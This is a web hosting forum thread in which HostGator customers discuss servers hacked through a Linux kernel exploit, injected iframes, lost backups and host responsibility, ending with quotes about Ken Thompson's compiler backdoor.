Hacked servers / 0 day exploit everyone read!!

[calum]

Quote:

Originally Posted by kmaw

I wasn't able to find anything on the web about it at the time of Brent's post... most here after the fact seemed to be after his as well...

You can find some information from this search:

http://www.google.com/search?aq=f&co...it&btnG=Search

But it is mainly just reports of it and how to carry it out

[DarkSorrow]

Quote:

Originally Posted by GatorNate

The second kernel is exploitable, which one is running?

uname -a

The 2nd one is just a game server box I have up. It's been up for about 4 years. It doesn't have cpanel or anything installed web wise.

http://70.84.191.146/stats/

[trd79]

Earlier today I got an e-mail from Google (as a user of their webmaster tools)

"We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com."

Looking at my site now, everything seems as normal. Was this as a result of Hostgator being hacked?

Quote:

Originally Posted by El Hombre

Well I lost pretty much everything here.

I cant use google cache to upload index pages.

I also cant believe that I am unlucky enough that HG managed to back up the hacked pages on 99% of my sites.

I now have lots of white blank pages where my sites used to be.
One site back to normal and one site with an index page and the rest of the links are broken.

Was this really a problem with other hosting companies or "another HG exclusive"?

I have tried finding threads on other hosting forums but unless I am looking in the wrong place then its seems it was only here. According to some news items I have seen its not the first time HG has been compromised like this.

I really don't think its good enough to just say, "we got hacked, we screwed up the backup, now it's your problem so fix it yourself"

Well that's my feeling for what it's worth.

Try http://www.archive.org/

[Nullivex]

Yes, google probably blacklisted your page as a result of the hacker content to protect searchers. If you contact that they will resolve it in 1-2 days.

[mach]

Quote:

Originally Posted by trd79

Earlier today I got an e-mail from Google (as a user of their webmaster tools)

"We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com."

Looking at my site now, everything seems as normal. Was this as a result of Hostgator being hacked?

Check your index page for some javascript inserted at the bottom.

I found a script that inserted an invisible iframe in my page.

The ip is currently down, but it could be what triggered google's warning. It set off Kaspersky, that's the only reason I noticed it.

[gtgeorge]

Yes the code you included in your post set off Avast with the forum post reply email that came in with:

Quote:

<iframe> tag found, it may be dangerous


Sender: HostGator Peer Support Forums - wesley@hostgator.com
Recipient: me@gmail.com
Subject: Reply to thread 'Hacked servers / 0 day exploit everyone read!!'

***
Target of remote iframe:
(You can permit them using "Permitted URLs" button)
201.235.235.174

[Sam]

Quote:

Originally Posted by gtgeorge

Yes the code you included in your post set off Avast with the forum post reply email that came in with:

.....

[mach]

Quote:

Originally Posted by gtgeorge

Yes the code you included in your post set off Avast with the forum post reply email that came in with:

Sorry about that.

Why didn't hostgator send out an email letting people know what happened? I don't know how long that iframe was on my page.

[gtgeorge]

Not sure why they didn't. I thought they went through and restored everyones accounts that were affected by this other than the ones on the 1 server that was being backed up during the exploit.

You really should pull the code you have pasted above, it's not good to hand out malicious code on public forums

[quietFinn]

Quote:

Originally Posted by mach

Sorry about that.

Why didn't hostgator send out an email letting people know what happened? I don't know how long that iframe was on my page.

The exploit this thread is about (random js toolkit) is not the same that happened in your site.

[Sam]

Quote:

Originally Posted by gtgeorge

You really should pull the code you have pasted above, it's not good to hand out malicious code on public forums

...Or put it in code tags

Whoa I have been reading and this isn't good for HostGator. I currently use Godaddy and there servers were not effected at all. this sort stuff makes me think twice about using HostGator.

You can not get a current index.php using google cache so why you're telling user they can, is beyond me. You can however get a html copy.

That doesn't help those non php scripters out any. As one person already stated they have no knowledge or a way to get copies of there old files. Yes they should have known better but, to be honest I have never had a hack issue using Godaddy.

Either your site is secure using htaccess or it isn't. For a server to get hacked tells me That Hostgator may not be the Hoster i thought it was and poorly coded.

[calum]

Quote:

Originally Posted by clyde4210

Whoa I have been reading and this isn't good for HostGator. I currently use Godaddy and there servers were not effected at all. this sort stuff makes me think twice about using HostGator.

You can not get a current index.php using google cache so why you're telling user they can, is beyond me. You can however get a html copy.

That doesn't help those non php scripters out any. As one person already stated they have no knowledge or a way to get copies of there old files. Yes they should have known better but, to be honest I have never had a hack issue using Godaddy.

Either your site is secure using htaccess or it isn't. For a server to get hacked tells me That Hostgator may not be the Hoster i thought it was and poorly coded.

The security flaw effected the Linux kernel, not HostGator specifically. This could of and will have happened to other hosts, but many cover it up and also HG is so big they are targetted. It was not a problem with anything HG made, it was a problem with the Linux kernel.

[blade32]

GoDaddy hosting is awful. Im sure this is a one off, HostGator isn't responsible.

Quote:

This is not isolated to being a hostgator problem. This is a problem for any server in the world running the latest secure kernel.

[whatrevolution]

Quote:

Originally Posted by Goddess Dix

with any hosting company, while they do backups, utlimately, you're responsible for maintaining a good backup of your site.

*COUGH* *COUGH* *COUGH*

[Goddess Dix]

Quote:

Originally Posted by clyde4210

That doesn't help those non php scripters out any. As one person already stated they have no knowledge or a way to get copies of there old files. Yes they should have known better but, to be honest I have never had a hack issue using Godaddy.

everyone is responsible for having your own copies of your site files. there is NO host who will tell you otherwise. while good hosts keep backups as well, these should be viewed as extra insurance, and not as a replacement for having access to local copies or backups.

Quote:

Either your site is secure using htaccess or it isn't. For a server to get hacked tells me That Hostgator may not be the Hoster i thought it was and poorly coded.

HG doesn't personally code Linux, which is an open-source operating system in use by a majority of web hosts online today..htaccess has nothing to do with a vulnerability in a linux kernal. nor does the webhost.

while hg tends to be more open and communicative about these problems than many webhosts-which i, for one, appreciate-this vulnerablity had NOTHING to do with hg or their security practices. hg does tend to get targeted because they are one of the largest and fastest growing hosts out there as mentioned eariler.

the only 100% hack-safe computer is one that is NOT connected to the internet. period.

[whatrevolution]

Quote:

Originally Posted by Goddess Dix

HG doesn't personally code Linux, which is an open-source operating system in use by a majority of web hosts online today..htaccess has nothing to do with a vulnerability in a linux kernal. nor does the webhost.

Search: Linux Kernel 2.6.17 exploit

[mach]

Quote:

Originally Posted by gtgeorge

You really should pull the code you have pasted above, it's not good to hand out malicious code on public forums

The code isn't malicious, it's what it links to that is malicious. Since the site that it links to is down, it is completely harmless. I don't know why it set off someone's avast, the html tags should have been escaped. Anyways, I removed it.

Quote:

Originally Posted by quietFinn

The exploit this thread is about (random js toolkit) is not the same that happened in your site.

Isn't this thread about the vmsplice exploit? I'm not sure what you're saying. Unless hostgator servers were recently comprised in addition to the vmsplice bug, I'm pretty sure what happened to my site is related to this thread.

[whatrevolution]

Quote:

Originally Posted by mach

I don't know why it set off someone's avast, the html tags should have been escaped. Anyways, I removed it.

Because you needed to wrap it in bbcode tags:

HTML Code:

<p>
Like this.
<script type="text/javascript">
      document.write("Hello World!")
      </script>
</p>

Yes the webhost has everything to do with linux. linux is made so that you can alter its code, hacks if you will. That is why linux puts out patches and fixes.

i am on a linux server and never had that issue using godaddy. my only complaint it is taking my site 2. seconds longer to load lately. so i thought of switching. which hostgator has the same price plan that i am on over there.

I'm not even going to go into it and a matter of fact i doubt i'll use hostgator. just for the simple fact this site is loaded with help my sites down and basically hostgator saying we are working on it.

[gtgeorge]

Quote:

Originally Posted by clyde4210

Yes the webhost has everything to do with linux. linux is made so that you can alter its code, hacks if you will. That is why linux puts out patches and fixes.

i am on a linux server and never had that issue using godaddy. my only complaint it is taking my site 2. seconds longer to load lately. so i thought of switching. which hostgator has the same price plan that i am on over there.

I'm not even going to go into it and a matter of fact i doubt i'll use hostgator. just for the simple fact this site is loaded with help my sites down and basically hostgator saying we are working on it.

You are clueless on this issue then as there was no patch and was found to occur in the latest kernels. The more likely answer is that GD was running an antiquated kernel that was not affected by the exploit!

[mach]

Quote:

Originally Posted by clyde4210

That is why linux puts out patches and fixes.

Linux is an operating system. Operating systems don't write patches for themselves.

Quote:

i am on a linux server and never had that issue using godaddy.

Others have: GoDaddy hosting customers victim to massive hack

[blade32]

Quote:

Originally Posted by Goddess Dix

everyone is responsible for having your own copies of your site files. there is NO host who will tell you otherwise. while good hosts keep backups as well, these should be viewed as extra insurance, and not as a replacement for having access to local copies or backups.



HG doesn't personally code Linux, which is an open-source operating system in use by a majority of web hosts online today..htaccess has nothing to do with a vulnerability in a linux kernal. nor does the webhost.

while hg tends to be more open and communicative about these problems than many webhosts-which i, for one, appreciate-this vulnerablity had NOTHING to do with hg or their security practices. hg does tend to get targeted because they are one of the largest and fastest growing hosts out there as mentioned eariler.

the only 100% hack-safe computer is one that is NOT connected to the internet. period.

Im being paranoid but a 100% safe computer is impossible!

[whatrevolution]

Quote:

Originally Posted by blade32

Im being paranoid but a 100% safe computer is impossible!

Quote:

Originally Posted by clyde4210

Yes the webhost has everything to do with linux. linux is made so that you can alter its code, hacks if you will. That is why linux puts out patches and fixes.

OH COME ON, Clyde...

Read a book, and stop grandstanding for the other newbs.

Quote:

The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.

Quote:

First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere.